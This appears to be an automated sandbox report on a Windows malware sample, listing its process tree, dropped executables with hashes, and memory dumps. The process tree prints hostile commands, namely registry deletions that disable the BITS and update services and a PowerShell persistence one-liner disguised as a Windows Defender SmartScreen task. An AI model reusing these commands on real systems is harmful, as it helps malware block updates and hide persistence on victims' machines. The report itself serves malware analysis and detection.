C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 828 -ip 8281⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD56919cb7fec497ea6efe75d900bd4faed
SHA1faeed1af977dce9132c287d6ca5dd2cfe5cee149
SHA256e8e98b6b3438def54faf3197f84d4dfc2091e7ee4f6b250b9ce427cbbd636f44
SHA5124dcb34b0e0d26c0a70d430ff51b4bda97ad8c495c403f0dfdbef33ab6cad92a73ddb2b8b3971b24f92a7c9698c4f3beb2b6daf9c714133238e5dee2273499a48
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaLFilesize
2KB
MD5dce9b749d38fdc247ab517e8a76e6102
SHA1d6c5b6548e1a3da3326bd097c50c49fc7906be3f
SHA2565087b8c7f2cecceac61d7bd02b939888cf2cc5a452676f28fd5c076eb1ae7ea7
SHA51256c276f0a070da656c98520aa720994d78f1bf0bbb085a5f6fb4fd18fed2bbba1eb8e97b54d58eaa9a978d21d64678170f49c020feb19d8545d158a2d8d58446
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5p5ekgz.n3k.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPjFilesize
71KB
MD592d24961d2ebaacf1ace5463dfc9930d
SHA199ffaf6904ab616c33a37ce01d383e4a493df335
SHA2569013688dec264c615178e151c2eb5f0b2eb9fe8cfad867b311d8581d921c73f3
SHA51277598c77f219ab5234b8b84bcfe873f40e7464b224fac3c8568b300d3f2563f7ef5ad9ec5cccc0d719e7d3e489a164b04b6b36316196afea0b8051de3c751cc7
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
memory/436-376-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/436-375-0x000001B1F3EC0000-0x000001B1F3EE7000-memory.dmpFilesize
156KB
-
memory/592-353-0x000001D7ED830000-0x000001D7ED851000-memory.dmpFilesize
132KB
-
memory/592-355-0x000001D7ED860000-0x000001D7ED887000-memory.dmpFilesize
156KB
-
memory/592-357-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/592-361-0x000001D7ED860000-0x000001D7ED887000-memory.dmpFilesize
156KB
-
memory/668-364-0x00000258CFC30000-0x00000258CFC57000-memory.dmpFilesize
156KB
-
memory/668-358-0x00000258CFC30000-0x00000258CFC57000-memory.dmpFilesize
156KB
-
memory/668-360-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/700-379-0x0000019444490000-0x00000194444B7000-memory.dmpFilesize
156KB
-
memory/700-380-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/700-432-0x0000019444490000-0x00000194444B7000-memory.dmpFilesize
156KB
-
memory/956-369-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/956-368-0x0000015ABABD0000-0x0000015ABABF7000-memory.dmpFilesize
156KB
-
memory/1016-370-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/1016-366-0x0000019D4DD80000-0x0000019D4DDA7000-memory.dmpFilesize
156KB
-
memory/1016-371-0x0000019D4DD80000-0x0000019D4DDA7000-memory.dmpFilesize
156KB
-
memory/1052-436-0x000002C81FCA0000-0x000002C81FCC7000-memory.dmpFilesize
156KB
-
memory/1052-388-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/1052-385-0x000002C81FCA0000-0x000002C81FCC7000-memory.dmpFilesize
156KB
-
memory/1060-439-0x000001C584DA0000-0x000001C584DC7000-memory.dmpFilesize
156KB
-
memory/1060-386-0x000001C584DA0000-0x000001C584DC7000-memory.dmpFilesize
156KB
-
memory/1060-389-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/1136-445-0x000001F984930000-0x000001F984957000-memory.dmpFilesize
156KB
-
memory/1136-393-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/1136-390-0x000001F984930000-0x000001F984957000-memory.dmpFilesize
156KB
-
memory/1208-451-0x0000027C31BD0000-0x0000027C31BF7000-memory.dmpFilesize
156KB
-
memory/1208-396-0x0000027C31BD0000-0x0000027C31BF7000-memory.dmpFilesize
156KB
-
memory/1208-397-0x00007FFCA97F0000-0x00007FFCA9800000-memory.dmpFilesize
64KB
-
memory/1220-401-0x00000207921A0000-0x00000207921C7000-memory.dmpFilesize
156KB
-
memory/1220-455-0x00000207921A0000-0x00000207921C7000-memory.dmpFilesize
156KB
-
memory/1296-341-0x00007FFCE7840000-0x00007FFCE78FE000-memory.dmpFilesize
760KB
-
memory/1296-339-0x000001F098B90000-0x000001F098BA0000-memory.dmpFilesize
64KB
-
memory/1296-340-0x00007FFCE9770000-0x00007FFCE9965000-memory.dmpFilesize
2.0MB
-
memory/1360-463-0x000001EEC95D0000-0x000001EEC95F7000-memory.dmpFilesize
156KB
-
memory/1372-469-0x0000024F09D40000-0x0000024F09D67000-memory.dmpFilesize
156KB
-
memory/1408-139-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/1408-133-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/1664-350-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1664-342-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1664-348-0x00007FFCE7840000-0x00007FFCE78FE000-memory.dmpFilesize
760KB
-
memory/1664-347-0x00007FFCE9770000-0x00007FFCE9965000-memory.dmpFilesize
2.0MB
-
memory/1664-346-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/2324-277-0x00000000057D0000-0x00000000057E0000-memory.dmpFilesize
64KB
-
memory/2324-269-0x00000000057D0000-0x00000000057E0000-memory.dmpFilesize
64KB
-
memory/2324-210-0x0000000005700000-0x0000000005792000-memory.dmpFilesize
584KB
-
memory/2324-224-0x00000000057D0000-0x00000000057E0000-memory.dmpFilesize
64KB
-
memory/2324-223-0x00000000057D0000-0x00000000057E0000-memory.dmpFilesize
64KB
-
memory/2324-206-0x0000000000D40000-0x0000000000EAC000-memory.dmpFilesize
1.4MB
-
memory/2324-218-0x0000000005B80000-0x0000000005B8A000-memory.dmpFilesize
40KB
-
memory/2540-186-0x0000000004B80000-0x0000000004B90000-memory.dmpFilesize
64KB
-
memory/2540-160-0x00000000741E0000-0x000000007422C000-memory.dmpFilesize
304KB
-
memory/2540-140-0x0000000004BD0000-0x0000000004C06000-memory.dmpFilesize
216KB
-
memory/2540-141-0x0000000005240000-0x0000000005868000-memory.dmpFilesize
6.2MB
-
memory/2540-142-0x00000000051C0000-0x00000000051E2000-memory.dmpFilesize
136KB
-
memory/2540-143-0x0000000004B80000-0x0000000004B90000-memory.dmpFilesize
64KB
-
memory/2540-144-0x0000000004B80000-0x0000000004B90000-memory.dmpFilesize
64KB
-
memory/2540-145-0x0000000005A60000-0x0000000005AC6000-memory.dmpFilesize
408KB
-
memory/2540-146-0x0000000005B40000-0x0000000005BA6000-memory.dmpFilesize
408KB
-
memory/2540-156-0x0000000006170000-0x000000000618E000-memory.dmpFilesize
120KB
-
memory/2540-157-0x0000000004B80000-0x0000000004B90000-memory.dmpFilesize
64KB
-
memory/2540-158-0x000000007F7C0000-0x000000007F7D0000-memory.dmpFilesize
64KB
-
memory/2540-159-0x0000000007320000-0x0000000007352000-memory.dmpFilesize
200KB
-
memory/2540-170-0x0000000006720000-0x000000000673E000-memory.dmpFilesize
120KB
-
memory/2540-187-0x000000007F7C0000-0x000000007F7D0000-memory.dmpFilesize
64KB
-
memory/2540-182-0x0000000004B80000-0x0000000004B90000-memory.dmpFilesize
64KB
-
memory/2540-181-0x0000000004B80000-0x0000000004B90000-memory.dmpFilesize
64KB
-
memory/2540-179-0x0000000008700000-0x0000000008CA4000-memory.dmpFilesize
5.6MB
-
memory/2540-178-0x0000000007820000-0x0000000007842000-memory.dmpFilesize
136KB
-
memory/2540-177-0x0000000007700000-0x0000000007708000-memory.dmpFilesize
32KB
-
memory/2540-176-0x00000000077C0000-0x00000000077DA000-memory.dmpFilesize
104KB
-
memory/2540-175-0x00000000076C0000-0x00000000076CE000-memory.dmpFilesize
56KB
-
memory/2540-174-0x0000000007720000-0x00000000077B6000-memory.dmpFilesize
600KB
-
memory/2540-173-0x0000000007500000-0x000000000750A000-memory.dmpFilesize
40KB
-
memory/2540-171-0x0000000007AD0000-0x000000000814A000-memory.dmpFilesize
6.5MB
-
memory/2540-172-0x0000000007490000-0x00000000074AA000-memory.dmpFilesize
104KB
-
memory/2724-311-0x0000021126E40000-0x0000021126E50000-memory.dmpFilesize
64KB
-
memory/2724-313-0x0000021126E40000-0x0000021126E50000-memory.dmpFilesize
64KB
-
memory/2724-312-0x0000021126E40000-0x0000021126E50000-memory.dmpFilesize
64KB
-
memory/2724-310-0x0000021126E40000-0x0000021126E50000-memory.dmpFilesize
64KB
-
memory/3520-282-0x000002BB383A0000-0x000002BB383C2000-memory.dmpFilesize
136KB
-
memory/3520-296-0x000002BB383F0000-0x000002BB38400000-memory.dmpFilesize
64KB
-
memory/3520-297-0x000002BB383F0000-0x000002BB38400000-memory.dmpFilesize
64KB
-
memory/3520-295-0x000002BB383F0000-0x000002BB38400000-memory.dmpFilesize
64KB
-
memory/3544-268-0x00007FF7EE040000-0x00007FF7EE400000-memory.dmpFilesize
3.8MB
-
memory/3544-318-0x00007FF7EE040000-0x00007FF7EE400000-memory.dmpFilesize
3.8MB
-
memory/4048-338-0x00000000033A0000-0x00000000033B0000-memory.dmpFilesize
64KB
-
memory/4048-349-0x00000000033A0000-0x00000000033B0000-memory.dmpFilesize
64KB
-
memory/4840-319-0x00007FF610150000-0x00007FF610179000-memory.dmpFilesize
164KB
-
memory/4948-387-0x000000000ED50000-0x000000000EDA7000-memory.dmpFilesize
348KB